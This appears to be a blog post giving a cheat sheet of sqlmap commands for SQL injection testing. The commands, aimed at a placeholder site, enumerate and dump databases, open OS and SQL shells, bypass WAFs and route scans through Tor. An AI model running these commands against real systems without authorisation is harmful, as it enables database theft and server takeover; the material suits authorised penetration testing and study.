Open in app

Sign in

Write

Sign in

SQLMap Cheat Sheet

Takuma
2 min readJul 31, 2019

--

sqlmap is an open source penetration testing application that automates the detection and exploitation of SQL injection vulnerabilities as well as the takeover of database systems.

NOTE: for each command using --dbms=mysql.
You don’t need to use it if you do not know the type of database,
but if you do, it will be faster than the command without this.

— — CHEAT SHEET — —

# Enum DB

sqlmap --dbms=mysql -u “http://takumatest.domain/" --dbs

# Enum tables

sqlmap --dbms=mysql -u “http://takumatest.domain/" -D target_DB --tables

--current-user : enum current user

--current-db : enum db name

# Use POST methods

sqlmap --dbms=mysql -u “http://takumatest.domain/" --data=”data1=aaa&data2=bbb”

# List of users and roles

sqlmap --dbms=mysql -u “http://takumatest.domain/" --users --roles --threads=10

# Custom Query

sqlmap --dbms=mysql -u “http://takumatest.domain/" --sql-query=”select * from master.sys.server_principals”

# Dump table

sqlmap --dbms=mysql -u “http://takumatest.domain/" -D target_DB -T target_Table --dump

# List columns

sqlmap --dbms=mysql -u “http://takumatest.domain/" -D target_DB -T target_Table --columns

# Parameter

sqlmap --dbms=mysql -u “http://takumatest.domain/param1=value1&param2=value2" --dbs -p param2

# Specify URIs

sqlmap --dbms=mysql -u “http://takumatest.domain/param1/value1*/param2/value2" --dbs

sqlmap -u ‘http://takumatest.domain/' --data=’param1=blah&param2=blah’ --cookie=’JSESSIONID=d02084cbe50e16aa4' --level=5 --risk=3 -p param1

# OS Shell

sqlmap --dbms=mysql -u “http://takumatest.domain/" --os-shell

# SQL Shell

sqlmap --dbms=mysql -u “http://takumatest.domain/" --sql-shell

# CMD Shell

sqlmap --dbms=mysql -u “http://takumatest.domain/" --os-cmd whoami

# Query

sqlmap --dbms=mysql -u “http://takumatest.domain/" -D target_DB --sql-query “SELECT * FROM TABLE;”

# Where Condition

sqlmap --dbms=mysql -u “http://takumatest.domain/" -D target_DB -T target_table --where “id>0”

# Scan through TOR

sqlmap -u “http://takumatest.domain/" --tor --tor-type=SOCKS5 --check-tor --dbms=mysql --dbs

# Basic authen & NTLM

sqlmap -u “http://takumatest.domain/” -s-data=param1=value1&param2=value2 -p param1 --auth-type=[basic/ntlm] --auth-cred=username:password

#Proxy

sqlmap -u “http://takumatest.domain/” --proxy=http://proxy_address:port

#Specific point to inject use *

sqlmap -u “http://takumatest.domain/abc/def/123*/data.php”

#Dump Limit

--start=1 --stop=10

#Bypass WAF (for example)

--tamper=”between,randomcase,space2comment”

#Techniques

--technique=BEUST
Stacked queries (S)
Error based (E)
Union query based (U)
Inline queries (I)
Boolean blind (B)
Time based blind (T)

#Clear cache

--fresh-queries
--flush-session

#Example for using command

sqlmap -r file-request.txt --random-agent --threads=10 --technique=B --level=3 --batch -D target_DB -T target_table --fresh-queries --count

— END —

Sqlmap
Hacking
Cheatsheet
Database
Sql Injection

--

--

Takuma
Takuma

Written by Takuma

14 Followers
1 Following

Cybersecurity, Cryptocurrency :)

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams